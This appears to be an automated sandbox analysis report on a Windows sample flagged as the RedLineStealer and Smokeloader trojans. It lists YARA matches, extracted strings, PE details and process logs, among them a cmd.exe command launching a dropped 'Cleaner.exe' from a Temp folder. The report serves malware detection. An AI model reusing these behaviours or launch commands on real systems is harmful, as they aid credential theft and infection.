                Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                Source: file.exe, 00000000.00000003.348371414.0000000003951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                Source: soft[1].0.drString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C28C2
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C2EE5
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C1B2E
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00CA91D
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C394F
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C553E
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C3F72
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C9B6D
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C678F
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C57D8
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C4601
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeCode function: 33_2_00007FFBB00C4EDD
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                Source: Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025tJump to behavior
                Source: classification engineClassification label: mal100.troj.winEXE@17/52@1/5
